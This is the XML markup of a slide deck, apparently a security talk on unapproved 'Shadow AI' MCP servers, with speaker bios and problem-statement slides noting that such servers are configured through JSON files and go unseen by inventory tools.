        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="386275" y="113950"/>
            <a:ext cx="1535500" cy="343250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="259" name="Google Shape;259;p38" title="shadow-mcp-finding-the-mcps-nobody-approved_peretz-frazer_1109653_feedback-code.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7350925" y="87400"/>
            <a:ext cx="1498100" cy="1498100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Google Shape;260;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5890225" y="162275"/>
            <a:ext cx="1460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Feedback:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Google Shape;261;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3148200" y="2183850"/>
            <a:ext cx="2847600" cy="77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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="28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2" name="Shape 82"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="986125" y="223200"/>
            <a:ext cx="2865300" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>About Us</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502800" y="1192250"/>
            <a:ext cx="8405100" cy="34644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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alex Frazer</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Founding Security Engineer @ Runlayer - building Shadow AI detection and MCP security tooling</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Previously: Security Lead at Radiant Security (AI-driven security triage), Director at Recorded Future (threat intelligence ops), Director of Engineering (Services) at Cybereason </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security researcher at Cybereason Labs - APT simulation, Windows security</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17+ years across security research, engineering, and leadership</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="18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8" name="Shape 88"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="986125" y="223200"/>
            <a:ext cx="2865300" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>About Us</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502800" y="1192250"/>
            <a:ext cx="8405100" cy="34644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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aidan Sochowski</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Senior Product Engineer at Runlayer: authentication, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eliminating customer friction,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and more</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Previously:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software Engineer at Glean (Connectors/Crawlers)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software Engineer at Youtube (Discovery Core Serving Infrastructure)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="18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4" name="Shape 94"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Problem</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792750" y="1401900"/>
            <a:ext cx="79401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Geist"/>
                <a:ea typeface="Geist"/>
                <a:cs typeface="Geist"/>
                <a:sym typeface="Geist"/>
              </a:rPr>
              <a:t>What if your users gave AI full access to your database, your GitHub org, and your Slack…</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:latin typeface="Geist"/>
              <a:ea typeface="Geist"/>
              <a:cs typeface="Geist"/>
              <a:sym typeface="Geist"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:latin typeface="Geist"/>
              <a:ea typeface="Geist"/>
              <a:cs typeface="Geist"/>
              <a:sym typeface="Geist"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Geist"/>
                <a:ea typeface="Geist"/>
                <a:cs typeface="Geist"/>
                <a:sym typeface="Geist"/>
              </a:rPr>
              <a:t>…and you had no idea?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:latin typeface="Geist"/>
              <a:ea typeface="Geist"/>
              <a:cs typeface="Geist"/>
              <a:sym typeface="Geist"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97" name="Google Shape;97;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173475" y="2514375"/>
            <a:ext cx="4559376" cy="2534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1" name="Shape 101"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Problem</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792750" y="1401900"/>
            <a:ext cx="79401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Geist"/>
                <a:ea typeface="Geist"/>
                <a:cs typeface="Geist"/>
                <a:sym typeface="Geist"/>
              </a:rPr>
              <a:t>Shadow IT is back.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:latin typeface="Geist"/>
              <a:ea typeface="Geist"/>
              <a:cs typeface="Geist"/>
              <a:sym typeface="Geist"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:latin typeface="Geist"/>
              <a:ea typeface="Geist"/>
              <a:cs typeface="Geist"/>
              <a:sym typeface="Geist"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Geist"/>
                <a:ea typeface="Geist"/>
                <a:cs typeface="Geist"/>
                <a:sym typeface="Geist"/>
              </a:rPr>
              <a:t>But this time it's AI-powered. Shadow AI.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:latin typeface="Geist"/>
              <a:ea typeface="Geist"/>
              <a:cs typeface="Geist"/>
              <a:sym typeface="Geist"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="Google Shape;104;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5077800" y="2645025"/>
            <a:ext cx="3655050" cy="2421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8" name="Shape 108"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Problem</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="873900" y="1410725"/>
            <a:ext cx="7901400" cy="33360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2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP Servers</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configured via JSON files in user home and project directories</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invisible to inventory tools</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
